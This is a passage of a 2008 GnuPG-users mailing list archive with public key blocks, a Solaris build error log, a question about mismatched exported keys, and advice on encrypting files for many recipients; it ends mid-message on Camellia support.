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 HwUPk0+gmM/De0X9LscUyWaJ =Ss+7 -----END PGP PUBLIC KEY BLOCK----- -- View this message in context: http://www.nabble.com/different-exported-and-uploaded-public-key-tp17769233p17769233.html Sent from the GnuPG - User mailing list archive at Nabble.com. From kush.asthana at gmail.com Thu Jun 12 00:08:37 2008 From: kush.asthana at gmail.com (Kush Asthana) Date: Wed, 11 Jun 2008 16:08:37 -0600 Subject: GNUPG 1.4.9 intallation fails on Solaris SunOS 5.10 Message-ID: <19319f700806111508k523122f5o73276b904ae72b19@mail.gmail.com> Hi I am trying to install GNUPG 1.4.9 on solaris 5.10 with following versions sparc-sun-solaris2.10 gcc v 3.4.3 ld: Software Generation Utilities - Solaris Link Editors: 5.10-1.482 Following error is encountered evertime I do make ====================================================== gmake all-recursive gmake[1]: Entering directory `/home/user/GNUPG/gnupg-1.4.9' Making all in m4 gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/m4' gmake[2]: Nothing to be done for `all'. gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/m4' Making all in intl gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/intl' gmake[2]: Nothing to be done for `all'. gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/intl' Making all in zlib gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/zlib' gmake[2]: Nothing to be done for `all'. gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/zlib' Making all in util gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/util' gmake[2]: Nothing to be done for `all'. gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/util' Making all in mpi gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/mpi' gmake[2]: Nothing to be done for `all'. gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/mpi' Making all in cipher gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/cipher' gmake[2]: Nothing to be done for `all'. gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/cipher' Making all in tools gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/tools' gcc -g -O2 -Wall -o mpicalc mpicalc.o ../cipher/libcipher.a ../mpi/libmpi.a ../util/libutil.a ../intl/libintl.a ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb57a9e is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb57aa2 is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb57aa6 is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb57c66 is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb57c6a is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb57c6e is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-rshift.o): symbol : offset 0xfeb57cb6 is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb57d12 is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb57d16 is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb57d1a is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb68b67 is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb68ebd is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-rshift.o): symbol : offset 0xfeb68f2b is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb68f8f is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb7b3fe is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb7b43e is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-rshift.o): symbol : offset 0xfeb7b45e is non-aligned ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb7b47e is non-aligned collect2: ld returned 1 exit status gmake[2]: *** [mpicalc] Error 1 gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/tools' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9' gmake: *** [all] Error 2 Kush ================================================================ Please help!! From rick at rickv.com Thu Jun 12 18:17:50 2008 From: rick at rickv.com (Rick Valenzuela) Date: Thu, 12 Jun 2008 12:17:50 -0400 Subject: different exported and uploaded public key In-Reply-To: <17769233.post@talk.nabble.com> References: <17769233.post@talk.nabble.com> Message-ID: <48514C2E.8020300@rickv.com> Gnupg-users -- I apologize for the double posting of this question. I originally sent it using Nabble, but while waiting for post approval I deleted and canceled them. Then I signed up for the list and posted them directly. I assume that one more question of mine will be double-posted, too. Sorry. Rick -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com stet wrote: > I just created a new primary key and subkeys, and uploaded them to > keyservers. Then I exported my public key in ascii-armor, and copied that > file to a web forum profile. I noticed that the very last few characters > were different from from what the keyservers said. How does that happen? > > Any help would be appreciated. > > At the top of this link is my uploaded public key: > http://keyserver.gingerbear.net:11371/pks/lookup?search=rick+valenzuela&fingerprint=on&op=index > > It is also different at pgp.mit.edu, and at > http://sks-keyservers.net/status/ > > Below is my public key as exported to an ascii file: > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: GnuPG v1.4.8 (Darwin) > > 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 > HwUPk0+gmM/De0X9LscUyWaJ > =Ss+7 > -----END PGP PUBLIC KEY BLOCK----- > From chd at chud.net Thu Jun 12 18:39:05 2008 From: chd at chud.net (Chris De Young) Date: Thu, 12 Jun 2008 09:39:05 -0700 Subject: Encrypting files for many users.. In-Reply-To: References: Message-ID: <48515129.2050805@chud.net> Sartoros Dionysios wrote: > Hey, > > Question for you guys, new gnupg user here, great software.. > > I was thinking of maybe encrypting files in PGP that many people will > require access to, since i dont know PGP inside and out I was wondering > what would be the best method, as sometimes I will have to remove access > for some users and add new users > > I dont know subkeys or how pgp works with files too well.. Can i > add/remove users' keys to encrypted files.. If i have 100 or even 1000 > files, would I have to do it one by one (to add a new user or remove > access to one).. Hrm... PGP/GPG may not be the best tool here. I think you will either have a key distribution problem, or a lot of work to do encrypting and re-encrypting your 1000 files every time someone leaves or arrives. You could encrypt all the 1000 files to a single key, and distribute that key to all your clients. When a new client arrives, you just have to give her the key. When a client leaves and you want to revoke access, you have to re-encrypt all your files to a new key and then distribute that key to all your clients. Or, you could collect the public keys for all your clients, and encrypt all your files to all those keys. If a client leaves, you have to re-encrypt everything to omit the key of the person who left. If a new client arrives, you *also* have to re-encrypt everything to add their public key to the list. But, you don't have the (potential) problem with distributing keys that you would in the first case. There are surely other approaches as well, this is just what comes to my mind. It's not elegant. Cheers, -C -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 250 bytes Desc: OpenPGP digital signature URL: From jmoore3rd at bellsouth.net Thu Jun 12 19:38:16 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Thu, 12 Jun 2008 13:38:16 -0400 Subject: Camellia In-Reply-To: <20080612143926.1F21B118040@mailserver5.hushmail.com> References: <20080612143926.1F21B118040@mailserver5.hushmail.com> Message-ID: <48515F08.2010801@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 vedaal at hush.com wrote: > how hard would it be to write a patch for an option of > --try-all-symmetrics > or > --use-symmetric-name > that would ignore the cipher number and try all of them, > or try only the one specified ? > > ( disclaimer: > *not* a feature request for the gnupg team :-) > > only a workaround thought > for the hackers who choose to enable Camellia now ) FWIW, 